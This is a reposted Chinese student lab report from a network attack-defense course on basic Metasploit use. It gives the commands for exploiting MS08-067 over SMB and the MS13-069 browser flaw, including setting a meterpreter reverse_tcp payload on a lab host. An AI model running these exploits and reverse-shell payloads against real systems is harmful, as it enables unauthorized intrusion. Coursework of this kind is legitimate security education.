首页 > 其他 > 详细

2018-2019-2 20165337《网络攻防技术》Exp5 MSF基础应用

时间:2019-04-21 20:29:18      阅读:162      评论:0      收藏:0      [点我收藏+]

一、实践目标

1.一个主动攻击实践

ms08_067

2.一个针对浏览器的攻击

ms13-069

3.一个针对客户端的攻击

adobe (Adobe_toolbutton客户端漏洞成功)

4.成功应用任何一个辅助模块

auxiliary/server/browser_autopwn

二、实验内容

主动攻击

首先输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址查看靶机是否存在该漏洞

技术分享图片

然后在攻击机Kali的命令行中输入msfconsole进入控制台
输入use exploit/windows/smb/ms08_067_netapi使用这个漏洞
之后输入show options查看需要设置的参数

技术分享图片

设置完靶机地址就可以完成
输入exploit进行攻击

技术分享图片

针对浏览器的攻击

首先search ms13找到ms13-069

技术分享图片

输入use exploit/windows/browser/ms13_069_caret
输入show options
查看需要设置的参数

技术分享图片

设置参数:
srvhost 192.168.1.154
srvport 80
set payload windows/meterpreter/reverse_tcp
lhost 192.168.1.154
输入exploit进行攻击

技术分享图片

攻击成功获取权限

技术分享图片

2018-2019-2 20165337《网络攻防技术》Exp5 MSF基础应用

原文:https://www.cnblogs.com/y963976867/p/10746603.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!